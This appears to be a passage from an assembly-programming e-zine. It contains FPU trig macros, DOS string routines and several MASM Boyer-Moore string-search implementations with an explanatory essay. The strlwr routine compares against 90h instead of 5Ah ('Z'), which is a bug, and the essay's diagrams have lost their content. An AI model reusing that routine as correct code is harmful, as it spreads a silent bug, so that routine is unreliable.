0.5 ArcCos MACRO ;Inverse Cosine, st(0) = arccos(st(0)) fld1 fld st(1) fmul st,st fsub fsqrt fpatan fchs fld hPi fadd EndM ArcSin Macro ;Inverse Sine, st(0) = arcsin(st(0)) fld1 fld st(1) fmul st,st fsub fsqrt fpatan EndM HSin Macro ;Hyperbolic Sin, st(0) = hsin(st(0) fldl2e fmul fld st frndint fsub st(1),st fld1 fscale fxch fstp st fxch f2xm1 fld1 fadd fmul fld st fld1 fdivr fsub fmul half EndM HCos Macro ;Hyperbolic Cos, st(0) = hcos(st(0) fldl2e fmul fld st frndint fsub st(1),st fld1 fscale fxch fstp st fxch f2xm1 fld1 fadd fmul fld st fld1 fdivr fadd fmul half EndM HTan Macro ;Hyperbolic Tan, st(0) = htan(st(0) fldl2e fmul fld st frndint fsub st(1),st fld1 fscale fxch fstp st fxch f2xm1 fld1 fadd fmul fmul st,st fld st fld1 fadd fxch fld1 fsub fdivr EndM getpass by Jake Bush ;Summary: Get a password type input. ;Compatibility: x86 ;Notes: input: ; BX = Max length to save. ; ES:DI = Location to save the input. (Size must be at least ; BX + 1). ; output: ; none. getpass: pusha xor cx, cx .1: xor ah, ah int 16h cmp al, 0dh je .4 cmp cx, 0h je .2 cmp al, 8h je .3 .2: cmp cx, bx je .1 cmp al, 20h jb .1 stosb pusha mov al, '*' mov ah, 0eh xor bh, bh mov cx, 1h int 10h popa inc cx jmp .1 .3: dec di dec cx pusha mov al, 8h mov ah, 0eh xor bh, bh mov cx, 1h int 10h mov al, ' ' int 10h mov al, 8h int 10h popa jmp .1 .4: mov al, 0h stosb popa ret strcmp by Jake Bush ;Summary: Compares two strings. ;Compatibility: x86 ;Notes: input: ; DS:SI = String 1. ; ES:DI = String 2. ; output: ; CF = 0 = Equal ; 1 = Unequal strcmp: pusha .1: mov al, [ds:si] mov ah, [es:di] cmp ah, al jne .2 cmp ax, 0h je .3 inc si inc di jmp .1 .2: stc jmp .4 .3: clc .4: popa ret strlwr by Jake Bush ;Summary: Converts all the characters in a ASCIIz string to lower-case. ;Compatibility: x86 ;Notes: input: ; DS:SI = Location of an string to convert. ; ES:DI = Location to save the converted string. ; output: ; none. strlwr: pusha .1: lodsb cmp al, 0h je .3 cmp al, 41h jb .2 cmp al, 90h ja .2 or al, 00100000b .2: stosb jmp .1 .3: popa ret strupr by Jake Bush ;Summary: Converts all the characters in a ASCIIz string to upper-case. ;Compatibility: x86 ;Notes: input: ; DS:SI = Location of an string to convert. ; ES:DI = Location to save the converted string. ; output: ; none. strupr: pusha .1: lodsb cmp al, 0h je .3 cmp al, 61h jb .2 cmp al, 7ah ja .2 xor al, 00100000b .2: stosb jmp .1 .3: popa ret ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::...........................................ISSUE.CHALLENGE Challenge --------- Code a fast pattern matching algorithm. Solution -------- Four approaches are presented here, three by Steve Hutchesson, who also wrote a very good introductory text explaining the foundation of the Boyer Moore search algorithm and its variations, and one by buliaNaza who aims at writing the fastest binary string search algorithm for PPlain and PMMX processors. Three Boyer Moore Exact Pattern Matching Algorithms by Steve Hutchesson Three Boyer Moore Exact Pattern Matching Algorithms ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Steve Hutchesson Sydney Australia August 2001 hutch@pbq.com.au In 1977 Robert Boyer and L. Moore designed an exact pattern matching algorithm that was different from any of the contemporary designs of the time. It had a fundamentally different logic that compared the pattern being searched for to the current location in the source in reverse order. The logic was based on obtaining more information from performing the comparison in reverse than the standard methods of forward comparison. If a character that caused the mismatch was not among the characters that were in the pattern being matched, there was no point in matching any further characters so the pattern could be shifted right by the number of characters needed to go past it. This shift has usually been called the BAD CHARACTER shift. | source : bad character shift pattern : shift | Character "t" mismatches with character "c" in the source. "c" is not in the pattern being searched for and there is no point in searching further back as no match is possible at the current location so the pattern is shifted the number of places right so that the pattern is completely past the mismatching character. | source : bad character shift pattern : shift | Character "t" again mismatches with character "c" in the source so the pattern is again shifted completely past the mismatching character. | source : bad character shift pattern : shift | The next mismatch is different to the previous ones, it is with a character that is within the pattern being searched for and this requires a different type of shift. When a character is within the pattern, it allows the capacity to start matching the pattern to the source. This shift is usually called the GOOD SUFFIX shift but it is sometimes called the MATCHING SHIFT. The fundamental Boyer Moore design uses a clever method of determining if the character being compared is within the pattern being searched for or not. It constructs a table of 256 members which is initially filled with the length of the pattern being searched for in the source. It then overwrites the position of each character in the pattern into the table at the correct position for the character's ascii value. This means that a character being compared can be tested in one memory read to determine if it is within the pattern or not, if the shift in the table is the same length as the pattern, the character is not in the pattern, if it is less, it is a character that is in the pattern. This will produce a set of shifts for the character in the pattern that descend in their value. pattern : shift 4321 <- GOOD SUFFIX shift 12345 <- BAD CHARACTER shift The method of calculating the BAD CHARACTER shift is based on the ascending count from the beginning of the pattern. If it is the first character being compared, the shift is the length of the pattern, for each comparison made, the shift decrements by one. Apply the GOOD SUFFIX shift from the table and the pattern is shifted across so that the character "s" lines up with the "s" in the source and the pattern has been matched. * source : bad character shift pattern : shift * This example works OK because the mismatch occurs on the first comparison but in patterns that have repeat sequences of characters, this matching by itself will often fail to produce a match. pattern : foooooo 711111 <- GOOD SUFFIX shift 1234567 <- BAD CHARACTER shift The sequence of "1" in the GOOD SUFFIX shift is caused by the overwriting of the location for the character "o" in the table for each of its occurrences. The normal method is to subtract the BAD CHARACTER shift from the GOOD SUFFIX shift if the mismatch is not the first at the current location in the source. This can produce a value less than 1 so a minimum shift of 1 is applied if this happens. Coding Considerations ~~~~~~~~~~~~~~~~~~~~~ Much of the available technical data on exact pattern matching is written in ANSI C and it tends to carry the set of assumptions related to the capacity of that language. The "holy grail" of exact pattern matching is to perform as few comparisons as necessary to obtain the match if it exists. This is usually called "sublinearity" and it means comparing less characters that a traditional forward BYTE scanner. The problem with this approach is that if the overhead to produce the "sublinearity" is too large, the algorithm is slower than a BYTE scanner so considerations of theoretical design must be tempered with what is possible with good coding practice to deliver the desired speed. The BAD CHARACTER shift has often been coded in high level languages as another table but it is a very inefficient way to code the shift as the loop counter in the main comparison loop holds the same value and it can be accessed a lot faster than a member of a table in memory. The three version presented below use an Intel specific optimisation related to preventing a register stall by reading and comparing a byte in AL and subsequently using the EAX register in the table location calculation. XOR EAX, EAX or SUB EAX, EAX both zero the register and the stall does not occur. This makes the code slightly slower on AMD hardware but not by very much. There is an additional heuristic in the original Boyer Moore algorithm that has not been implemented, when a BAD CHARACTER shift has been determined, the heuristic requires that the larger of the two shifts should be applied. In practice the two extra instructions to perform this comparison reduce the speed of the algorithm by about 5%. Where a GOOD SUFFIX shift is required that is the first mismatch at the current location, the calculation that subtracts the BAD CHARACTER shift is not required so a seperate loop has been included to save this extra two instructions. The speed increase is about 5% for doing so. Processor Variation ~~~~~~~~~~~~~~~~~~~ Testing shows that there is measurable differences between later Intel processors and later AMD processors. The AMD has a shorter pipeline and a lower penalty for register stalls where the Intel processors have better branch prediction and a lower penalty for mispredicted jumps. The GOOD SUFFIX shift favours the AMD processors where the BAD CHARACTER shift works better on the Intel processors. Three variations are implemented that utilise the different shifts, the original BM algorithm uses both shifts, a variation that is similar to a Horspool variation uses only the BAD CHARACTER shift and another variation only uses the GOOD SUFFIX shift. Algorithm Variations ~~~~~~~~~~~~~~~~~~~~ The original BM algorithm has a slightly higher overhead than the two variations but it generally produces a larger shift and this has the effect that it is more consistent across both processor types with different patterns and different pattern lengths. This is because it it more dependent on logic that fast loop code. The Horspool variation perfoms well on Intel hardware and is well suited for plain text search in things like text editors and word processors but it is sensitive to patterns that have a high frequency of characters in the source being searched. Its advantage is small loop code in the searching phase. In this implementation, it does the comparison in reverse order as this method produces the BAD CHARACTER shift in the most efficient manner. The second variation uses only the GOOD SUFFIX shift and generally performs well on older Intel hardware and later AMD machines. It has the advantage of fast loop code but by only using one of the available shifts, its average shift length is shorter than the original algorithm. It uses the same bypass for the first mismatch that the original BM algo has. Limitations ~~~~~~~~~~~ The pattern length threshold for improving on a forward byte scanner appears to be about 6 characters. Below this a BYTE scanner is faster. A BM type algorithm has about a 300 character penalty in the time it takes to construct the table and this must be kept in mind if the task requires recursively searching short sources for short patterns. A slightly more subtle consideration is what is called "mismatch recovery". Boyer Moore algorithms have normally been sensitive to the frequency of end characters in the pattern and this is easy to demonstrate when searching plain text when the pattern has a trailing blank space in it. EXAMPLE : "pattern " The solution is to code the comparison loop with a very short instruction path and while this does not particularly increase the absolute forward scanning speed of the algorithm type, it does improve its recovery from repeated mismatches. The three algorithms presented below have very good mismatch recovery which is related to their very short comparison loops instruction paths. The three algorithms have been tested on Intel Celeron, PII and PIII machines and AMD K6-2, Duron and Athlon machines. They have been optimised to run on both types without specifically targetting one particular model. Slight speed increases can be obtained by coding specifically for one particular model but usually at the expense of most other processors. The parameters for the 3 procedures. startpos zero based offset to start searching in the source lpSource the address of the source to search srcLngth the length of the source lpSubStr the address of the pattern to search for subLngth the length of the pattern @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ The basic Boyer Moore algorithm @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ; ######################################################################### .486 .model flat, stdcall ; 32 bit memory model option casemap :none ; case sensitive .code ; ######################################################################### BMBinSearch proc startpos:DWORD, lpSource:DWORD,srcLngth:DWORD, lpSubStr:DWORD,subLngth:DWORD LOCAL cval :DWORD LOCAL shift_table[256]:DWORD push ebx push esi push edi mov ebx, subLngth cmp ebx, 1 jg @F mov eax, -2 ; string too short, must be > 1 jmp Cleanup @@: mov esi, lpSource add esi, srcLngth sub esi, ebx mov edx, esi ; set Exit Length ; ---------------------------------------- ; load shift table with value in subLngth ; ---------------------------------------- mov ecx, 256 mov eax, ebx lea edi, shift_table rep stosd ; ---------------------------------------------- ; load decending count values into shift table ; ---------------------------------------------- mov ecx, ebx ; SubString length in ECX dec ecx ; correct for zero based index mov esi, lpSubStr ; address of SubString in ESI lea edi, shift_table xor eax, eax Write_Shift_Chars: mov al, [esi] ; get the character inc esi mov [edi+eax*4], ecx ; write shift for each character dec ecx ; to ascii location in table jnz Write_Shift_Chars ; ----------------------------- ; set up for main compare loop ; ----------------------------- mov ecx, ebx dec ecx mov cval, ecx mov esi, lpSource mov edi, lpSubStr add esi, startpos ; add starting position jmp Pre_Loop ; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Calc_Suffix_Shift: add eax, ecx sub eax, cval ; sub loop count jns Add_Suffix_Shift mov eax, 1 ; minimum shift is 1 Add_Suffix_Shift: add esi, eax ; add SUFFIX shift mov ecx, cval ; reset counter in compare loop Test_Length: cmp edx, esi ; test exit condition jl No_Match Pre_Loop: xor eax, eax ; zero EAX for following partial writes mov al, [esi+ecx] cmp al, [edi+ecx] ; cmp characters in ESI / EDI je @F mov eax, shift_table[eax*4] cmp ebx, eax jne Add_Suffix_Shift ; bypass SUFFIX calculations lea esi, [esi+ecx+1] ; add BAD CHAR shift jmp Test_Length @@: dec ecx xor eax, eax ; zero EAX for following partial writes Cmp_Loop: mov al, [esi+ecx] cmp al, [edi+ecx] ; cmp characters in ESI / EDI jne Set_Shift ; if not equal, get next shift dec ecx jns Cmp_Loop jmp Match ; fall through on match Set_Shift: mov eax, shift_table[eax*4] cmp ebx, eax jne Calc_Suffix_Shift ; run SUFFIX calculations lea esi, [esi+ecx+1] ; add BAD CHAR shift jmp Test_Length ; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Match: sub esi, lpSource ; sub source from ESI mov eax, esi ; put length in eax jmp Cleanup No_Match: mov eax, -1 Cleanup: pop edi pop esi pop ebx ret BMBinSearch endp ; ######################################################################### end @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ The Horspool style variation using the BAD CHARACTER shift @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ; ######################################################################### .486 .model flat, stdcall ; 32 bit memory model option casemap :none ; case sensitive .code ; ######################################################################### BMHBinsearch proc startpos:DWORD, lpSource:DWORD,srcLngth:DWORD, lpSubStr:DWORD,subLngth:DWORD LOCAL cval:DWORD LOCAL shift_table[256]:DWORD push ebx push esi push edi mov ebx, subLngth cmp ebx, 1 jg @F mov eax, -2 ; string too short, must be > 1 jmp BMHout @@: mov esi, lpSource add esi, srcLngth sub esi, ebx mov edx, esi ; set Exit Length ; ---------------------------------------- ; load shift table with value in subLngth ; ---------------------------------------- mov ecx, 256 mov eax, ebx lea edi, shift_table rep stosd ; ---------------------------------------------- ; load decending count values into shift table ; ---------------------------------------------- mov ecx, ebx ; SubString length in ECX dec ecx ; correct for zero based index mov esi, lpSubStr ; address of SubString in ESI lea edi, shift_table xor eax, eax Write_Chars: mov al, [esi] ; get the character inc esi mov [edi+eax*4], ecx ; write shift for each character dec ecx ; to ascii location in table jnz Write_Chars ; ----------------------------- ; set up for main compare loop ; ----------------------------- mov ecx, ebx dec ecx mov cval, ecx mov esi, lpSource mov edi, lpSubStr add esi, startpos ; add starting position ; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Main_Loop: sub eax, eax ; zero EAX before partial write mov al, [esi+ecx] cmp al, [edi+ecx] ; cmp characters in ESI / EDI jne Get_Shift ; if not equal, get next shift dec ecx jns Main_Loop jmp Matchx Get_Shift: inc esi ; inc esi for minimum shift cmp ebx, shift_table[eax*4] ; cmp subLngth to char shift jne Exit_Test add esi, ecx ; add bad char shift Exit_Test: mov ecx, cval ; reset counter in compare loop cmp esi, edx ; test for exit condition jl Main_Loop jmp MisMatch ; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Matchx: sub esi, lpSource ; sub source from ESI mov eax, esi ; put length in eax jmp BMHout MisMatch: mov eax, -1 BMHout: pop edi pop esi pop ebx ret BMHBinsearch endp ; ######################################################################### end @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ The simplified version using the GOOD SUFFIX shift @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ; ######################################################################### .486 .model flat, stdcall ; 32 bit memory model option casemap :none ; case sensitive .code ; ######################################################################### SBMBinSearch proc startpos:DWORD, lpSource:DWORD,srcLngth:DWORD, lpSubStr:DWORD,subLngth:DWORD LOCAL shift_table[256]:DWORD push ebx push esi push edi mov edx, subLngth cmp edx, 1 jg @F mov eax, -2 ; string too short, must be > 1 jmp Cleanup @@: mov esi, lpSource add esi, srcLngth sub esi, edx mov ebx, esi ; set Exit Length ; ---------------------------------------- ; load shift table with value in subLngth ; ---------------------------------------- mov ecx, 256 mov eax, edx lea edi, shift_table rep stosd ; ---------------------------------------------- ; load decending count values into shift table ; ---------------------------------------------- mov ecx, edx ; SubString length in ECX dec ecx ; correct for zero based index mov esi, lpSubStr ; address of SubString in ESI lea edi, shift_table xor eax, eax Write_Shift_Chars: mov al, [esi] ; get the character inc esi mov [edi+eax*4], ecx ; write shift for each character dec ecx ; to ascii location in table jnz Write_Shift_Chars ; ----------------------------- ; set up for main compare loop ; ----------------------------- mov esi, lpSource mov edi, lpSubStr dec edx xor eax, eax ; zero EAX add esi, startpos ; add starting position jmp Cmp_Loop ; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Calc_Suffix_Shift: add ecx, shift_table[eax*4] ; add shift value to loop counter sub ecx, edx ; sub pattern length jns Pre_Compare mov ecx, 1 ; minimum shift is 1 Pre_Compare: add esi, ecx ; add suffix shift mov ecx, edx ; reset counter for compare loop Exit_Text: cmp ebx, esi ; test exit condition jl No_Match xor eax, eax ; clear EAX for following partial writes mov al, [esi+ecx] cmp al, [edi+ecx] ; cmp characters in ESI / EDI je @F add esi, shift_table[eax*4] jmp Exit_Text @@: dec ecx xor eax, eax ; clear EAX for following partial writes Cmp_Loop: mov al, [esi+ecx] cmp al, [edi+ecx] ; cmp characters in ESI / EDI jne Calc_Suffix_Shift ; if not equal, get next shift dec ecx jns Cmp_Loop jmp Match ; match on fall through ; %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Match: sub esi, lpSource ; sub source from ESI mov eax, esi ; put length in eax jmp Cleanup No_Match: mov eax, -1 Cleanup: pop edi pop esi pop ebx ret SBMBinSearch endp ; ######################################################################### end ********************************** END ************************************* Fastest Binary String Search Algorithm by buliaNaza ; Fastest binary string search algo with ; PPlain and PMMX type of processors ; 2001 by buliaNaza ; ; ; .data? ; align 4 ; !!! skip_table DD 256 Dup(?) ; skip table ; ; ;...............................; ; Usage: esi ->pBuffer ; esi->buffer with bytes to be searched through ; ebp = lenBuffer ; ebp =length of the buffer ; ebx ->pSrchData ; ebx->pointer to data to be searched for ; edx = lenSrchData ; edx=length of data to be searched for ; edi ->pskip_table ; edi->pointer to skip table (must be aligned) ; call BMCaseSNext ; ;.................................; .code ; BMCaseSNext: ; cmp edx, 4 ; edx = length of data to be searched for jg Boyer_Moore ; ;... Brute Force Search ..........; for 4 digits or less only! mov edi, [ebx] ; edi = dword of data to be searched for mov ecx, 5 ; sub ecx, edx ; lea eax, [esi+edx-1] ; eax->new starting address in pBuffer shl ecx, 3 ; *8 mov bl, [ebx+edx-1] ; get last byte only mov bh, bl ; copy in bh bswap edi ; shr edi, cl ; add ebp, esi ; ebp ->end of buffer and ebx, 0FFFFh ; ebx = need the bx word only mov ecx, ebx ; mov esi, edx ; esi=edx = length of data to be searched for shl ecx, 16 ; test eax, 3 ; lea ebx, [ebx+ecx] ; jz Search_2 ; Unalign_1: ; cmp eax, ebp ; ebp ->end of buffer jge Not_found ; mov cl, [eax] ; inc eax ; cmp cl, bl ; jz Compare_1 ; Search_1: ; test eax, 3 ; jnz Unalign_1 ; Search_2: ; cmp eax, ebp ;u ebp ->end of buffer jge Not_found ;v mov ecx, [eax] ;u scasb for the last byte from pSrchData add eax, 4 ;v xor ecx, ebx ;u mov edx, 7EFEFEFFh ;v add edx, ecx ;u xor ecx, -1 ;v xor ecx, edx ;u mov edx, [eax-4] ;v and ecx, 81010100h ;u jz Search_2 ;v ; cmp dl, bl ; jz Minus_4 ; cmp dh, bl ; jz Minus_3 ; shr edx, 16 ; cmp dl, bl ; jz Minus_2 ; cmp dh, bl ; jz Compare_1 ; jnz Search_2 ; Minus_2: ; dec eax ; jnz Compare_1 ; Minus_4: ; sub eax, 3 ; jnz Compare_1 ; Minus_3: ; sub eax, 2 ; Compare_1: ; mov edx, edi ; cmp eax, ebp ; ebp ->end of buffer jg Not_found ; cmp esi, 1 ; jz Found_1 ; cmp dl, [eax-2] ; eax->pBuffer jnz Search_1 ; cmp esi, 2 ; jz Found_1 ; cmp dh, [eax-3] ; eax->pBuffer jnz Search_1 ; cmp esi, 3 ; jz Found_1 ; shr edx, 16 ; mov cl, [eax-4] ; eax->pBuffer cmp dl, cl ; jnz Search_1 ; Found_1: ; sub eax, esi ; in eax->pointer to 1st ret ; occurrence of data found in pBuffer ;...Boyer Moore Case Sens Next Search...; Boyer_Moore: ; add esi, ebp ; esi->pointer to the last byte of pBuffer lea ebx, [ebx+edx-1] ; ebx->pointer to the last byte of pSrchData neg edx ; edx= -lenSrchData mov ecx, edx ; ecx = edx = -lenSrchData add ebp, edx ; sub lenSrchData from lenBuffer mov eax, 256 ; eax = counter xor ebp, -1 ; not ebp->current negative index MaxSkipLens: ; mov [eax*4+edi-4], edx ; filling up the skip_table with -lenSrchData mov [eax*4+edi-8], edx ; mov [eax*4+edi-12], edx ; mov [eax*4+edi-16], edx ; mov [eax*4+edi-20], edx ; mov [eax*4+edi-24], edx ; mov [eax*4+edi-28], edx ; mov [eax*4+edi-32], edx ; mov [eax*4+edi-36], edx ; mov [eax*4+edi-40], edx ; mov [eax*4+edi-44], edx ; mov [eax*4+edi-48], edx ; mov [eax*4+edi-52], edx ; mov [eax*4+edi-56], edx ; mov [eax*4+edi-60], edx ; mov [eax*4+edi-64], edx ; mov [eax*4+edi-68], edx ; mov [eax*4+edi-72], edx ; mov [eax*4+edi-76], edx ; mov [eax*4+edi-80], edx ; mov [eax*4+edi-84], edx ; mov [eax*4+edi-88], edx ; mov [eax*4+edi-92], edx ; mov [eax*4+edi-96], edx ; mov [eax*4+edi-100], edx ; mov [eax*4+edi-104], edx ; mov [eax*4+edi-108], edx ; mov [eax*4+edi-112], edx ; mov [eax*4+edi-116], edx ; mov [eax*4+edi-120], edx ; mov [eax*4+edi-124], edx ; mov [eax*4+edi-128], edx ; sub eax, 32 ; jne MaxSkipLens ; loop while eax=0 SkipLens: ; mov al, [ecx+ebx+1] ;u filling up with the real negative offset of inc ecx ;v every byte from the pSrchData, starting from mov [eax*4+edi], ecx ;u the last to the first, at the offset in jne SkipLens ;v skip_table equal to the ASCII code of the ; byte, multiplied by 4 Search: ; the main searching loop-> FAST PART mov al, [esi+ebp] ;u get a byte from pBuffer ->esi +ebp mov ecx, edx ;v ecx=edx= -lenSrchData sub ebp, [eax*4+edi] ;u sub negative offset for this byte from ; skip_table jc Search ;v if dword ptr [eax*4+edi] AND ebp <> 0 loop ; again lea ebp, [ebp+esi+1] ;u current negative index -> next byte (+1) jge Not_found ;v end of pBuffer control (if ebp>=0 end) ; compare previous bytes from pSrchData (->ebx) Compare: ; and current offset in pBuffer (->ebp)->SLOW ; PART mov eax, [ebx+ecx+1] ; one dword from pSrchData -> ebx inc ecx ; ecx = -lenSrchData jz Found ; if ecx = 0 Found&Exit cmp al, [ebp+ecx-1] ; ebp->pBuffer jnz Not_equal ; inc ecx ; ecx = -lenSrchData jz Found ; if ecx = 0 Found&Exit cmp ah, [ebp+ecx-1] ; ebp->pBuffer jnz Not_equal ; inc ecx ; ecx = -lenSrchData jz Found ; if ecx=0 Found&Exit shr eax, 16 ; inc ecx ; cmp al, [ebp+ecx-2] ; ebp->pBuffer jnz Not_equal ; test ecx, ecx ; ecx = -lenSrchData jz Found ; if ecx=0 Found&Exit cmp ah, [ebp+ecx-1] ; ebp->pBuffer jz Compare ; Not_equal: ; sub eax, eax ; eax = 0 sub ebp, esi ; restore ebp->current negative index jl Search ; end of pBuffer control Not_found: ; or eax, -1 ; Exit with flag Not_Found eax=-1 ret ; Found: ; lea eax, [ebp+edx] ; in eax->pointer to 1st ret ; occurrence of data found in pBuffer ::/ \::::::. :/___\:::::::. /| \::::::::. :| _/\:::::::::. :| _|\ \::::::::::. :::\_____\:::::::::::.......................................................FIN